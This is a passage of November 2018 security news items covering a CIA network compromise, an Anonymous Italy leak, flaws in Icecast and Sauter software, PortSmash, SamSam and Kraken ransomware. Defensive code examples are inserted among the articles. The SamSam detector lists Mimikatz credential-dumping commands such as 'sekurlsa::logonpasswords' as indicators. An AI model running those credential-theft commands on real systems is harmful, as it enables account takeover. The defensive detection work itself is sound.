The alleged hack of the communications network used by CIA agents allowed Iranian intelligence to identify and kill at least 30 spies.

According to Yahoo! News, the security breach happened in 2009, when Iranian intelligence infiltrated a series of websites used by the CIA to communicate with agents worldwide, including in Iran and China.

“The previously unreported global problem originated in Iran and spiderwebbed to other countries, and was left unrepaired — despite warnings about what was happening — until more than two dozen sources died in China in 2011 and 2012 as a result, according to 11 former intelligence and national security officials.” reported Yahoo News.

“A former senior intelligence official with direct knowledge of the compromise said it had global implications for the CIA. “You start thinking twice about people, from China to Russia to Iran to North Korea,” said the former official. The CIA was worried about its network “totally unwinding worldwide.””

A former national security official confirmed that the US Intelligence Agency is still dealing with the fallout and dozens of people around the world were killed because of this failure.

Experts speculate that the hack of the communications network was the result of a simple Google search. Iranian intelligence initially identified a double agent who showed them one of the sites used by the CIA's network of agents; Iranian counter-espionage then used Google to identify other similar sites used by the CIA and started to intercept their communications.

“According to the former intelligence official, once the Iranian double agent showed Iranian intelligence the website used to communicate with his or her CIA handlers, they began to scour the internet for websites with similar digital signifiers or components — eventually hitting on the right string of advanced search terms to locate other secret CIA websites. From there, Iranian intelligence tracked who was visiting these sites, and from where, and began to unravel the wider CIA network.” continues the report.

“In fact, the Iranians used Google to identify the website the CIA was using to communicate with agents.”

Iran announced it had identified and arrested many spies, some of whom were executed.

Iran also shared information about the CIA communication network with friendly countries, which used it to dismantle CIA activities in their own territories.

In a 2012 incident in China, the Chinese government identified and killed 30 US spies.

The report published by Yahoo also cited a CIA defense contractor named John Reidy, who warned the agency that it was using insecure communications systems in 2008, and again in 2010. Unfortunately, he was fired by the agency, likely in retaliation for not shutting up.

“In 2008 — well before the Iranians had arrested any agents — a defense contractor named John Reidy, whose job it was to identify, contact and manage human sources for the CIA in Iran, had already sounded an alarm about a “massive intelligence failure” having to do with “communications” with sources.” states the report.

“According to Reidy’s publicly available but heavily redacted whistleblower disclosure, by 2010 he said he was told that the “nightmare scenario” he had warned about regarding the secret communications platform had, in fact, occurred.”

“It was a recipe for disaster,” Reidy said. “We had a catastrophic failure on our hands that would ensnare a great many of our sources.”

New attack by Anonymous Italy: personal data from ministries and police have been released online
6.11.2018 securityaffairs

New attack by Anonymous Italy: personal data from ministries and police have been released online. The site of Fratelli d’Italia, a post-fascist party, has been defaced
The iconoclastic fury of Italian Anonymous does not stop. As announced, the three groups coordinating the operation “Black Week” have today released new data from their raids on online sites and databases. The material disclosed today includes names, surnames, telephone numbers and email addresses of employees and officials of various research institutes of the National Research Council, the Equitalia databases and that of the Ministry of Economic Development.

Sensitive data of members of the Lega Nord del Trentino, Fratelli d’Italia and the Democratic Party of the city of Siena were disseminated. Then there are names and surnames belonging to Assopolizia (a national association of police officers) from Rome to Belluno, and those of the Central Institute for Archives. Ironically, it is the same Institute that has the task of developing national standards and guidelines for the creation of archival information systems and digital databases, let’s say without too much attention to security. The leaked information also includes the names of users of a portal on the theme of railways and model trains, perhaps confused with that of the State Railways.

A fact that tells us two things: Anonymous has mixed high-profile targets, such as the General Directorate for Energy Activities of the Ministry of Economic Development, with a site picked at random. Repubblica has been able to check the data in the databases released by Anonymous “in the wild”, as IT people say. In fact, the names, surnames, telephone numbers and passwords of the workers of some attacked entities present in the disclosed databases are real. In the case of employees of the Ministry of Economic Development we could verify that not all the passwords matched, but the names, emails, and telephone and landline numbers did.

According to Professor Rocco De Nicola of the IMT School for Advanced Studies Lucca, an expert in cybersecurity, “It is time for anyone who sets up a site to do so with special attention to privacy and security.”

Several sites were also defaced during the “Black Week”. Today it was the turn of the site of Fratelli d’Italia, a post-fascist party, whose homepage has been replaced with the mask of Anonymous. The attacks, the defacements, the disclosure of mail archives, names and telephone numbers are meant, in the hacktivists' intentions, to celebrate November 5, the anniversary of the Gunpowder Plot, in which the English revolutionary Guy Fawkes took part and whose face has become a universal symbol of rebellion thanks to the mask made famous by the film “V for Vendetta”.

The attack is also the contribution of Anonymous Italy to the Million Mask March, the march of a million masks against abuse of power by anyone, committed anywhere in the world, today at 18:00 in Milan, simultaneously with the event in Amsterdam. Meanwhile, hundreds of people disguised as Guy Fawkes have already filled the streets of cities and capitals such as London and Brisbane, and in Germany, Norway, the Philippines, even Nepal.

This protest has been politically motivated since the first video-release of October 28 in which the Anonymous invited “the people” to react (“The fear has taken possession of you, and the mental chaos has meant that you address the current government “) calling everyone to action:

«If you see what we see, if you think of it as we think, and if you are looking like we are, we ask you to stand by our side, and no longer accept the lies and the gag that puts us in the state.»

Now, with today’s leak, they reaffirmed that privacy is not a joke and that an increasingly digital society is a fragile society. By definition.

Flaw in Icecast streaming media server allows attackers to take online radio stations off air
5.11.2018 securityaffairs

The Icecast streaming media server is affected by a flaw that could be exploited by an attacker to take online radio stations off air.
The Icecast streaming media server is affected by a vulnerability, tracked as CVE-2018-18820, that could be exploited by an attacker to take online radio stations off air. Icecast supports both audio and video data and is maintained by the Xiph.org Foundation. Icecast is distributed under the GNU GPL, version 2; it can be used to create an Internet radio station or a privately running jukebox, and many things in between.

The vulnerability was discovered by a researcher at the Semmle Security Research Team using LGTM, a code analysis platform that checks code for vulnerabilities.

“I spotted a vulnerability in Icecast, the open source streaming media server maintained by the Xiph.org Foundation.” reads the security advisory.

“Attackers could craft HTTP headers that would overwrite the server’s stack contents, leading to remote code execution. Since Icecast is commonly used to host internet radio stations, a motivated attacker could potentially take a station off air.”

The flaw affects Icecast servers running versions 2.4.0 to 2.4.3 and using URL authentication.

The expert developed a proof-of-concept exploit that caused a segmentation fault in the server process, triggering a DoS condition. The expert pointed out that further effort could allow a persistent attacker to achieve full-blown remote code execution on the vulnerable system.


The experts at Xiph promptly patched the flaw with minimal effort and a simple fix.

“The folks at Xiph patched the bug quickly, and the fix is pretty simple. It simply checks the return value from snprintf, and, if it causes post_offset to point beyond the end of the buffer, it logs an error and exits the loop.” continues the advisory.
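The bug class the advisory describes, as an added example written for this page and not Icecast's code: a loop that appends formatted header fields to a fixed-size buffer with snprintf and advances post_offset by the return value. The buffer size, the header struct and the helper names are assumptions of this example; only the logic of the fix (check the snprintf return value and, when the offset would pass the end of the buffer, log an error and leave the loop) follows the advisory.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not Icecast's code. It models the bug class from the advisory:
 * a loop that appends formatted header fields to a fixed-size buffer with
 * snprintf and advances post_offset by the return value. snprintf returns the
 * length the complete output WOULD have had, even when it truncated, so an
 * unchecked post_offset can end up beyond the buffer, and the next iteration
 * then receives a wrapped (huge) remaining size and writes out of bounds.
 * The buffer size, struct and helper names are assumptions of this example. */

#define POST_BUF_SIZE 48

struct header {
    const char *name;
    const char *value;
};

/* Dry run of the UNCHECKED offset arithmetic. snprintf(NULL, 0, ...) only
 * computes the length and writes nothing, so this is safe to run and shows
 * where post_offset lands if every return value is added blindly. */
size_t unchecked_final_offset(const struct header *hdrs, size_t n)
{
    size_t post_offset = 0;
    for (size_t i = 0; i < n; i++)
        post_offset += (size_t)snprintf(NULL, 0, "%s=%s&",
                                        hdrs[i].name, hdrs[i].value);
    return post_offset; /* can exceed POST_BUF_SIZE */
}

/* The "remaining space" the unchecked loop would hand to snprintf on the next
 * iteration. Once post_offset passes the buffer size this wraps around, which
 * is what lets an oversized header reach memory beyond the buffer. */
size_t unchecked_remaining(size_t post_offset)
{
    return POST_BUF_SIZE - post_offset;
}

/* Hardened loop, following the fix the advisory describes: check the snprintf
 * return value and, if post_offset would move past the end of the buffer, log
 * an error and exit the loop. Returns 0 on success, -1 when output was cut
 * short; *out_offset receives the offset reached. post_buf is always
 * NUL-terminated and post_offset never exceeds size - 1. */
int build_post_checked(char *post_buf, size_t size,
                       const struct header *hdrs, size_t n,
                       size_t *out_offset)
{
    size_t post_offset = 0;
    int status = 0;

    post_buf[0] = '\0';
    for (size_t i = 0; i < n; i++) {
        int ret = snprintf(post_buf + post_offset, size - post_offset,
                           "%s=%s&", hdrs[i].name, hdrs[i].value);
        /* ret >= remaining means snprintf truncated: the offset must not
         * advance, because post_offset + ret would point past the buffer. */
        if (ret < 0 || (size_t)ret >= size - post_offset) {
            fprintf(stderr, "post body too long at header '%s'; "
                            "dropping remaining headers\n", hdrs[i].name);
            status = -1;
            break;
        }
        post_offset += (size_t)ret;
    }
    *out_offset = post_offset;
    return status;
}

int main(void)
{
    /* Constructed sample headers; the 40-byte value is the oversized one. */
    const struct header hdrs[] = {
        { "user",  "alice" },
        { "pass",  "s3cret" },
        { "agent", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" },
    };
    char post_buf[POST_BUF_SIZE];
    size_t post_offset = 0;

    printf("unchecked offset would reach %zu (buffer is %d bytes)\n",
           unchecked_final_offset(hdrs, 3), POST_BUF_SIZE);
    int rc = build_post_checked(post_buf, sizeof post_buf, hdrs, 3,
                                &post_offset);
    printf("checked: status %d, offset %zu, body \"%s\"\n",
           rc, post_offset, post_buf);
    return 0;
}
```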

Users should upgrade their installs to version 2.4.4 as soon as possible.

Technical details of the vulnerability are included in the post published by Nick Rolfe of the Semmle Security Research Team.

USB drives are primary vector for destructive threats to industrial facilities
5.11.2018 securityaffairs

USB removable storage devices are the main vector for malware attacks against industrial facilities, states Honeywell report.
According to a report published by Honeywell, malware-based attacks against industrial facilities mostly leverage USB removable storage devices.

Experts from Honeywell analyzed data collected with the Secure Media Exchange (SMX), a product it launched in 2017 and designed to protect industrial facilities from USB-borne threats.


The experts analyzed attacks against energy, oil and gas, chemical manufacturing, pulp and paper, and other sectors, collecting data from 50 locations on four continents.

In 44% of the analyzed locations, the SMX product had blocked at least one suspicious file; of the neutralized threats, the experts pointed out, 26% could have caused major disruptions to ICS systems.

“While the volume of malware discovered in this research was small relative to the total sample size volume, the malware potency was significant.” states the report.

“Of those threats blocked by SMX, 1 in 4 (26%) had the potential to cause a major disruption to an industrial control environment, including loss of view or loss of control, and 16% were targeted specifically against Industrial Control System (ICS) or Internet of Things (IoT) systems.”

16% of the malware detected by the product was specifically designed to target ICS or IoT systems, and 15% of the samples belonged to high profile families such as Mirai (6%), Stuxnet (2%), Triton (2%), and WannaCry (1%).


“These findings are worrisome for several reasons. That high-potency threats were at all prevalent on USB drives bound for industrial control facility use is the first concern. As ICS security experts are well aware, it only takes one instance of malware bypassing security defenses to rapidly execute a successful, widespread attack,” continues the report.

“Second, the findings also confirm that such threats do exist in the wild, as the high-potency malware was detected among day-to-day routine traffic, not pure research labs or test environments. Finally, as historical trends have shown, newly emerging threat techniques such as TRITON, which target Safety Instrumented Systems, can provoke copycat attackers.”

The report shows that most of the attacks involved non-targeted threats: most of the malware detected by the Honeywell product consisted of Trojans (55%), followed by bots (11%), hacking tools (6%), and potentially unwanted applications (5%).

The analysis of malware functionalities revealed that 32% of malicious code implemented RAT features, 12% dropper capabilities and 10% DDoS abilities.

Of the malware discovered, 9% was designed to directly exploit flaws in the USB protocol or interface.

“Of the malware discovered, 9% was designed to directly exploit USB protocol or interface weaknesses, making USB delivery even more effective — especially on older or poorly configured computers that are more susceptible to USB exploits.” continues the report.

“Some went further, attacking the USB interface itself. 2% were associated with common Human Interface Device (HID) attacks, which trick the USB host controller into thinking there is a keyboard attached, allowing the malware to type commands and manipulate applications. This supports earlier Honeywell findings that confirmed HID attacks such as BadUSB as realistic threats to industrial operators.”

High severity XML external entity flaw affects Sauter building automation product
5.11.2018 securityaffairs

A security researcher has found a serious vulnerability in a building automation product from Sauter AG that could be exploited to steal files from an affected system.
Sauter AG's CASE Suite, a building automation product used worldwide, is affected by a high severity XML external entity (XXE) vulnerability that could be exploited to steal files from an affected system.

According to ICS-CERT, the software is widely used in the critical manufacturing sector.

The flaw is tracked as CVE-2018-17912 and was discovered by Gjoko Krstic from industrial cybersecurity firm Applied Risk. The issue affects CASE Suite versions 3.10 and prior and impacts the CASE Components, CASE Sensors, and CASE VAV applications.

“An XXE vulnerability exists when processing parameter entities, which may allow remote file disclosure.” reads the security advisory published by the ICS-CERT.

“Successful exploitation of this vulnerability could allow an attacker to remotely retrieve unauthorized files from the system.”

The security vulnerability has been assigned a CVSS score of 7.5 by ICS-CERT; an attacker can exploit it to steal any file from the vulnerable system, including personal information, account credentials, and configuration data.

According to the advisory published by Applied Risk, there are no known public exploits targeting this flaw.

“An unauthenticated user can craft a malicious XML data file that will enable them to read arbitrary files within the context of an affected system allowing disclosure of valuable information via out of band channels” reads the security advisory published by Applied Risk.

Krstic pointed out that the vulnerability can also be exploited to trigger a denial-of-service (DoS) condition.


The vulnerability could be triggered using a specially crafted malicious XML data file that enables an attacker to read arbitrary files within the context of an affected system.

“The application suffers from an XML External Entity (XXE) vulnerability using the DTD parameter entities technique resulting in disclosure and retrieval of arbitrary data on the affected node via out-of-band (OOB) attack,” continues Applied Risk.

“The vulnerability is triggered when input passed to the XML parser is not sanitized while parsing the XML data file.”

The malicious file can be sent to the victims via email, or an attacker who already has access to the system can place the malicious XML file anywhere on it; the file is loaded automatically when the user browses to that path in the Sauter software.

The good news is that Sauter released a security patch only ten days after ICS-CERT notified the company.

PortSmash flaw in Hyper-Threading CPU could allow sensitive data theft
5.11.2018 securityaffairs

PortSmash is a side-channel flaw that could be exploited with a timing attack to steal information from other processes running on the same CPU core.
PortSmash is a new side-channel vulnerability that could be exploited with a timing attack to steal information from other processes running on the same CPU core with SMT/Hyper-Threading enabled.

A group of researchers from Tampere University of Technology in Finland (Billy Bob Brumley, Cesar Pereida Garcia, Sohaib ul Hassan, and Nicola Tuveri) and the Universidad Tecnologica de la Habana CUJAE in Cuba (Alejandro Cabrera Aldaya) demonstrated that it is possible to steal a private decryption key from an OpenSSL thread running in the same CPU core where the exploit code was in execution.

The experts also published a research paper titled “Port Contention for Fun and Profit.”

“We steal an OpenSSL (<= 1.1.0h) P-384 private key from a TLS server using this new side-channel vector. It is a local attack in the sense that the malicious process must be running on the same physical core as the victim (an OpenSSL-powered TLS server in this case).” reads the security advisory.

SMT (Simultaneous Multithreading), marketed by Intel as Hyper-Threading, lets a single physical CPU core run two hardware threads at once, sharing the core's execution units to increase throughput. That sharing is exactly what the attack measures.

The researchers measured contention on the core's execution ports to build a timing side channel and exfiltrate a private key from a process running in parallel on the same core.

“These ports are the object of the discussed port contention. Let’s for example suppose port 5 is used by a victim process during a particular crypto operation: while the victim process is not using port 5, the spy process running on the other thread will have undelayed access to repeatedly execute on port 5; as soon as the victim process issues an operation on port 5, the scheduler will delay ops from the spy process to ensure fairness. The spy process can thus measure the delay in the execution of its operations for port 5, and determine when the victim process is using the same port.

This is the signal that can then be processed to ultimately recover a private key.” – Tuveri told BleepingComputer.

The experts successfully tested the attack on Intel Skylake and Kaby Lake processors, and they expect it to work on AMD Ryzen processors as well.

“We verified it on Intel Skylake and Kaby Lake, but just because we did not have access to different machines with SMT,” Tuveri added.

“We expect it to work also on AMD Ryzen, but left this to future work.”

The experts also published a proof-of-concept exploit targeting OpenSSL; the library's maintainers addressed the issue in OpenSSL 1.1.1.

To mitigate the attack at the hardware level, the experts suggest disabling SMT/Hyper-Threading; the OpenSSL update removes the specific leak the proof of concept exploits, but not the port-contention channel itself.

Crooks offered for sale private messages for 81k Facebook accounts
5.11.2018 securityaffairs

Cybercriminals are offering for sale private messages from at least 81,000 Facebook accounts, claiming to be in possession of data from 120 million accounts.
The crooks are selling the private messages of 81,000 hacked Facebook accounts for 10 cents per account.

According to the BBC, crooks are offering for sale on underground criminal forums the private messages of 81,000 hacked Facebook accounts.

“The perpetrators told the BBC Russian Service that they had details from a total of 120 million accounts, which they were attempting to sell, although there are reasons to be sceptical about that figure.” states the BBC.

The BBC Russian Service investigated the alleged data breach along with cybersecurity firm Digital Shadows and determined they are authentic.

Most of the 81,000 Facebook users whose data were offered for sale were from Ukraine and Russia.


The seller, who goes by the moniker “FBSaler,” claims to be in possession of information on 120 million Facebook users and is offering access to the private messages for 10 cents per account.

FBSaler advertised the data on an underground hacking forum called BlackHatWorld and provided a link to a site named FBServer where sample data was posted.

“We sell personal information of Facebook users. Our database includes 120 million accounts, with the ability to sample by specific countries. The cost of one profile is 10 cents.” Wrote FBSaler.

“Data from a further 176,000 accounts was also made available, although some of the information – including email addresses and phone numbers – could have been scraped from members who had not hidden it,” continued the BBC report.

Experts from Digital Shadows traced the advertisement to an IP address in Saint Petersburg and also linked that IP address to a campaign spreading the LokiBot password-stealing malware.

Which is the data source?

Facebook analyzed the data and discovered that information offered by crooks has been harvested through malicious browser extensions.

“We have contacted browser-makers to ensure that known malicious extensions are no longer available to download in their stores,” said Facebook executive Guy Rosen.

“We have also contacted law enforcement and have worked with local authorities to remove the website that displayed information from Facebook accounts.”

Malicious browser extensions are a common means for attackers to obtain this kind of information: an extension that runs on every page the victim visits can read the rendered messages and session cookies directly, with no need to break Facebook's own authentication.

In September 2017, a malicious Chrome extension dubbed Browse-Secure, which masqueraded as an extension for performing encrypted searches, was used to steal information from Facebook accounts.

Experts suggest avoiding browser extensions that are installed by only a small number of users or that have poor ratings, and reviewing the permissions an extension requests before installing it.
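The practical check behind that advice is the extension's manifest: a message-harvesting extension needs broad host access, a content script on the target site, and usually cookie or network-request permissions. The script below is an added example, not code from Facebook, Digital Shadows or any browser vendor; both manifests it audits are constructed, the permission lists it treats as sensitive are the author's own choice, and the watched-site list is an assumption you would adapt to your own environment.

```python
"""Added example: audit a browser extension's manifest.json for the permission
set a message-stealing extension needs.  Illustrative code, not Facebook's or
any browser vendor's; both manifests below are constructed."""
import json

# Constructed manifest of a plausible data-harvesting extension: injects into
# Facebook and Messenger at document_start and can read cookies and requests.
SUSPECT_MANIFEST = json.dumps({
    "name": "Browse Secure Search",
    "manifest_version": 2,
    "permissions": ["<all_urls>", "tabs", "cookies", "webRequest",
                    "webRequestBlocking", "storage"],
    "content_scripts": [{"matches": ["*://*.facebook.com/*", "*://*.messenger.com/*"],
                         "js": ["inject.js"], "run_at": "document_start"}],
    "background": {"scripts": ["bg.js"]},
})

# Constructed manifest of a narrowly scoped extension for comparison.
BENIGN_MANIFEST = json.dumps({
    "name": "Word Counter",
    "manifest_version": 2,
    "permissions": ["activeTab"],
    "browser_action": {"default_popup": "popup.html"},
})

# Assumed policy: which patterns count as "every site" and which API
# permissions deserve a second look.  Adjust to taste.
BROAD_HOSTS = ("<all_urls>", "*://*/*", "http://*/*", "https://*/*")
SENSITIVE_API_PERMISSIONS = {"tabs", "cookies", "webRequest", "webRequestBlocking",
                             "history", "clipboardRead", "nativeMessaging"}
WATCHED_SITES = ("facebook.com", "messenger.com")   # assumption: sites you care about


def _matches_watched_site(pattern):
    """True if a match pattern or host permission covers one of WATCHED_SITES."""
    if pattern in BROAD_HOSTS:
        return True
    host = pattern.split("://", 1)[-1].split("/", 1)[0]
    return any(site in host for site in WATCHED_SITES)


def audit_manifest(manifest_text):
    """Return a list of human-readable findings; an empty list means nothing stood out."""
    m = json.loads(manifest_text)
    findings = []
    # MV2 keeps host patterns in "permissions"; MV3 moves them to "host_permissions".
    perms = list(m.get("permissions", [])) + list(m.get("host_permissions", []))
    for p in perms:
        if p in BROAD_HOSTS:
            findings.append(f"broad host permission {p}: can read and modify every page")
        elif p in SENSITIVE_API_PERMISSIONS:
            findings.append(f"sensitive API permission {p}")
        elif "://" in p and _matches_watched_site(p):
            findings.append(f"host permission {p} covers a watched site")
    for cs in m.get("content_scripts", []):
        watched = [pat for pat in cs.get("matches", []) if _matches_watched_site(pat)]
        if watched:
            when = cs.get("run_at", "document_idle")
            findings.append(f"content script {cs.get('js')} injected into {watched} at {when}")
    # The combination is what makes session theft trivial, so call it out explicitly.
    if {"cookies", "webRequest"} <= set(perms) and any(p in BROAD_HOSTS for p in perms):
        findings.append("cookies + webRequest + broad hosts: can capture session tokens for any site")
    return findings


if __name__ == "__main__":
    for name, text in (("suspect", SUSPECT_MANIFEST), ("benign", BENIGN_MANIFEST)):
        print(name, audit_manifest(text))
```

The audit is deliberately noisy: a legitimate extension can need `tabs` or `<all_urls>`, so treat findings as questions to ask about an extension rather than as a verdict. The one combination worth treating as a hard stop is the last finding, since cookies plus request interception across all hosts is enough to replay a victim's session from anywhere.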

SamSam ransomware continues to make damages. Call it targeted Ransomware
5.11.2018 securityaffairs

According to the Symantec experts, the group behind the SamSam ransomware has continued to launch attacks against organizations during 2018.
Security experts from Symantec published an analysis of the evolution of the SamSam ransomware, which in recent months has been involved in targeted attacks against several organizations, including the Colorado Department of Transportation (DOT) and the City of Atlanta.
According to the experts, the group behind SamSam has continued to attack organizations during 2018: Symantec observed fresh attacks against 67 different targets, most of them in the U.S.

SamSam is not a new threat: attacks were observed as far back as 2015, and the list of victims is long, many of them in the healthcare industry. The attackers gain access to a company’s internal network by brute-forcing RDP connections and spread the malware from there.

Among the victims of SamSam is the MedStar non-profit group, which manages 10 hospitals in the Baltimore and Washington area. The crooks behind the attack on MedStar demanded 45 Bitcoins (about US$18,500) to restore the encrypted files, but the organization refused to pay because it had backups of the encrypted information.

In April 2016, the FBI issued a confidential urgent “Flash” alert to businesses and organizations about SamSam.

SamSam made headlines again in the first days of 2018, when the malicious code infected the systems of several high-profile targets, including hospitals, an ICS firm, and a city council.

Symantec pointed out that SamSam mostly hit the healthcare sector (24% of victim organizations), likely because healthcare organizations are easier to compromise and more likely to pay the ransom.

SamSam differs from commodity ransomware; Symantec uses the term “targeted ransomware” because the operators perform extensive reconnaissance inside the network before launching the encryption.

“SamSam specializes in targeted ransomware attacks, breaking into networks and encrypting multiple computers across an organization before issuing a high-value ransom demand.” reads the analysis published by Symantec.

“The vast majority of SamSam’s targets are located in the U.S. Of the 67 organizations targeted during 2018, 56 were located in the U.S. A small number of attacks were logged in Portugal, France, Australia, Ireland, and Israel.”


The SamSam crew is highly skilled and resourceful; the experts compared its attacks with those carried out by cyber espionage groups.

“In order to carry out its attacks, the SamSam group makes extensive use of “living off the land” tactics: the use of operating system features or legitimate network administration tools to compromise victims’ networks.” continues the analysis.

“These tactics are frequently used by espionage groups in order to maintain a low profile on the target’s network. “

The hackers use freely available hacking tools such as Mimikatz as well as legitimate software such as Microsoft Sysinternals PsInfo, which lets a user gather information about other computers on the network.

The experts close the post by stressing the importance of backing up important data to combat ransomware infections.
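The two behaviours the article names, RDP brute forcing for entry and living-off-the-land tooling (PsInfo, Mimikatz) afterwards, are both visible in ordinary Windows telemetry before any file is encrypted. The script below is an added example of that detection logic, not Symantec's code; the events it runs over are constructed and only loosely modelled on Windows Security event 4625/4624 (logon type 10 is RDP) and Sysmon event 1 (process creation), and the thresholds and tool indicators are the author's assumptions.

```python
"""Added example: detection logic for the SamSam behaviours the article names,
RDP brute forcing and "living off the land" with Sysinternals/Mimikatz.
Illustrative code, not Symantec's; the events below are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta


def _failed_logon(ts, src_ip, user):
    # Modelled on Security 4625 with logon type 10 = RemoteInteractive (RDP).
    return {"ts": ts, "event_id": 4625, "src_ip": src_ip, "user": user, "logon_type": 10}


SAMPLE_EVENTS = []
_base = datetime(2018, 11, 5, 2, 0, 0)
# 30 failed RDP logons from one source in 90 seconds, then a success.
for _i in range(30):
    SAMPLE_EVENTS.append(_failed_logon(_base + timedelta(seconds=3 * _i), "203.0.113.7", "administrator"))
SAMPLE_EVENTS.append({"ts": _base + timedelta(seconds=95), "event_id": 4624,
                      "src_ip": "203.0.113.7", "user": "administrator", "logon_type": 10})
# A legitimate user mistyping a password a few times over half an hour.
for _i in range(3):
    SAMPLE_EVENTS.append(_failed_logon(_base + timedelta(hours=8, minutes=10 * _i), "198.51.100.4", "jsmith"))
# Post-compromise process creations, modelled on Sysmon event 1.
SAMPLE_EVENTS += [
    {"ts": _base + timedelta(minutes=5), "event_id": 1, "image": r"C:\Windows\Temp\psinfo.exe",
     "cmdline": r"psinfo.exe \\* -h", "user": "CORP\\administrator"},
    {"ts": _base + timedelta(minutes=7), "event_id": 1, "image": r"C:\Windows\Temp\m.exe",
     "cmdline": "m.exe privilege::debug sekurlsa::logonpasswords", "user": "CORP\\administrator"},
    {"ts": _base + timedelta(hours=9), "event_id": 1, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe", "user": "CORP\\jsmith"},
]


def rdp_bruteforce_sources(events, threshold=20, window=timedelta(minutes=5)):
    """Return {src_ip: peak failures within one window} for sources that reach threshold."""
    failures = defaultdict(list)
    for e in events:
        if e["event_id"] == 4625 and e.get("logon_type") == 10:
            failures[e["src_ip"]].append(e["ts"])
    flagged = {}
    for ip, times in failures.items():
        times.sort()
        start, peak = 0, 0
        for end in range(len(times)):          # sliding window over sorted timestamps
            while times[end] - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged[ip] = peak
    return flagged


# Indicators for the tools the article names.  A renamed binary defeats the
# image-name check, so command-line fragments are matched as well.
TOOL_INDICATORS = {
    "psinfo": ("psinfo.exe", r"psinfo.exe \\"),
    "psexec": ("psexec.exe", "psexesvc"),
    "mimikatz": ("mimikatz.exe", "sekurlsa::", "privilege::debug", "lsadump::"),
}


def suspicious_process_events(events):
    """Return (tool_name, event) pairs for process creations matching TOOL_INDICATORS."""
    hits = []
    for e in events:
        if e["event_id"] != 1:
            continue
        haystack = (e.get("image", "") + " " + e.get("cmdline", "")).lower()
        for tool, needles in TOOL_INDICATORS.items():
            if any(n.lower() in haystack for n in needles):
                hits.append((tool, e))
                break
    return hits


def successful_logon_after_bruteforce(events, flagged):
    """Sources that brute forced RDP and then logged on successfully: the entry event."""
    return sorted({e["src_ip"] for e in events
                   if e["event_id"] == 4624 and e.get("logon_type") == 10 and e["src_ip"] in flagged})


if __name__ == "__main__":
    flagged = rdp_bruteforce_sources(SAMPLE_EVENTS)
    print("RDP brute force:", flagged)
    print("brute force followed by success:", successful_logon_after_bruteforce(SAMPLE_EVENTS, flagged))
    for tool, e in suspicious_process_events(SAMPLE_EVENTS):
        print(f"{tool}: {e['image']} by {e['user']}")
```

The brute-force detector alone is noisy on any internet-exposed RDP host; the actionable signal is the 4624 that follows a flagged burst, which is why the third function exists. On the process side, matching Mimikatz module names in the command line catches the renamed `m.exe` that an image-name rule would miss.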

Twitter deletes over 10,000 accounts that aim to influence U.S. voting
5.11.2018 securityaffairs

Twitter announced to have deleted more than 10,000 accounts managed by bots that were posting messages to influence U.S. Midterm election.
Twitter announced that it has deleted more than 10,000 bot-controlled accounts that were posting messages to discourage people from voting in Tuesday’s U.S. midterm election. The accounts were designed to appear as if run by Democrats; the party reported the abuse to Twitter and called for action, and the company deleted them in late September and early October.

“We took action on relevant accounts and activity on Twitter,” a Twitter spokesman told Reuters via email.

The suspension of the accounts was requested by the Democratic Congressional Campaign Committee (DCCC), a party group that supports Democrats running for the U.S. House of Representatives.

The DCCC has developed a system for identifying and reporting bots used to control social media accounts; it leverages publicly available tools such as “Hoaxley” and “Botometer” developed by computer researchers at Indiana University.

“We made Hoaxley and Botometer free for anyone to use because people deserve to know what’s a bot and what’s not,” explained Filippo Menczer, professor of informatics and computer science at Indiana University.

The Democratic National Committee is part of a network of professionals and contractors that works to identify misinformation campaigns on social media.

The working group includes RoBhat Labs, a firm that has developed technology to unmask bot activity on social networks.

“We provide the DNC with reports about what we’re seeing in terms of bot activity and where it’s being amplified,” said DNC Chief Technology Officer Raffi Krikorian.
“We can’t tell you who’s behind these different operations, Twitter hides that from us, but with the technology you know when and how it’s happening.”

Kraken ransomware 2.0 is available through the RaaS model
5.11.2018 securityaffairs

The author of the infamous Kraken ransomware has released a new version of the malicious code and launched a RaaS distribution program on the Dark Web.
Researchers from Recorded Future’s Insikt Group and McAfee’s Advanced Threat Research team have discovered a new version of the malware that is offered through a RaaS distribution program on the Dark Web.

The new Kraken v.2 version is being advertised on an underground forum and is available through a ransomware-as-a-service (RaaS) model. For just $50 it is possible to join the affiliate program as a trusted partner and receive a new, improved build of the Kraken ransomware every 15 days. Affiliates keep 80 percent of the paid ransom, and the operators offer 24/7 support.

“The McAfee Advanced Threat Research team, working with the Insikt group from Recorded Future, found evidence of the Kraken authors asking the Fallout team to be added to the Exploit Kit. With this partnership, Kraken now has an additional malware delivery method for its criminal customers.” reads a post published by McAfee.

“We also found that the user associated with Kraken ransomware, ThisWasKraken, has a paid account. Paid accounts are not uncommon on underground forums, but usually malware developers who offer services such as ransomware are highly trusted members and are vetted by other high-level forum members. Members with paid accounts are generally distrusted by the community.”

Kraken Cryptor is a ransomware-as-a-service (RaaS) affiliate program that first appeared in the cybercrime underground on August 16, 2018, it was advertised in a top-tier Russian-speaking cybercriminal forum by the threat actor ThisWasKraken.

At the end of September, the security researcher nao_sec discovered that the Fallout Exploit Kit (the same used to distribute GandCrab ransomware) started to deliver the Kraken ransomware.


After the victim pays the full ransom, the affiliate sends 20 percent of the payment to the RaaS operator, receives the decryption key from ThisWasKraken, and forwards it to the victim.

Like other threats of this kind, the Kraken Cryptor RaaS does not allow affiliates to infect users in a number of former Soviet bloc countries.

“In addition to the countries listed above, the latest samples of Kraken that have been identified in the wild no longer affect victims in Syria, Brazil, and Iran, suggesting that ThisWasKraken (or their associates) may have some connection to Brazil and Iran, though this is not confirmed. It is likely that Syria was added following the plea for help from a victim whose computer was infected by another ransomware called GandCrab.” reads the analysis published by Recorded Future.

Insikt Group experts noticed that the RaaS operators don’t allow affiliates to submit Kraken samples to antivirus services and don’t provide refunds for purchased payloads.

The authors of the Kraken ransomware released a map showing the distribution of victims.


The ransomware has already infected 620 victims worldwide since August, but the experts pointed out that the first real campaign only started last month, when attackers disguised the threat as a security solution on the SuperAntiSpyware website.

Kraken Cryptor 1.5 ransomware sample: https://www.virustotal.com/en/file/9c88c66f44eba049dcf45204315aaf8ba1e660822f9e97aec51b1c305f5fdf14/analysis/1536633203/
Note is now html, name: # How to Decrypt Files.html
Victims from CIS countries & Iran get free decryption. W/ having "IP address & geolocation" data, citizenship card still needed...
